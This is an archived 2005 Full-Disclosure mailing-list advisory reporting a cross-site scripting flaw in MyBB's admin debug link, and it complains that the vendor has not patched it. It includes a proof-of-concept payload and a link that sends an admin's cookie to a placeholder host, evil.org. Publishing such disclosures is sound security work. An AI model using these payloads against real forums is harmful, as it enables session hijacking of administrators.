[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] XSS VULN IN ALL MYBB VERSIONS (INCLUDING PR2)
- To: <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: [Full-disclosure] XSS VULN IN ALL MYBB VERSIONS (INCLUDING PR2)
- From: "Parikh, Dominic" <Dominic.Parikh@xxxxxxxxxxxxxxxxxxxxxxx>
- Date: Mon, 5 Sep 2005 14:15:58 +0100
XSS VULN IN ALL MYBB VERSIONS (INCLUDING PR2)
Vendor: given SEVEN days notice, no patch released!
Just to say, I am apalled with the fact that I contacted MyBB on the 30
August, and was originally not planning to go public.
However, because they have failed to release a patch I have decided to
alert the wider community.
At the bottom of every page shown to the admins is a debug link.
Unfortunately, this fails to properly sanitize user input, so, for
example, you could try:
'forumdisplay.php?fid=2&datecut=""><script>alert(document.cookie)</scrip
t>'
Although only admins can exploit this vuln, someone could send them a
link such as
[forumdisplay.php?fid=2&datecut=
<http://www.forum.com/forumdisplay.php?fid=2&datecut=>
""><script>window.location="http://evil.org/steal.php?cookie="+document.
cookie</script>]
and ouch!
robokoder
fusionnx.com- The Web Developer's Resource Centre
#####################################################################################
This email has been scanned by MailMarshal, an email content filter.
#####################################################################################
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/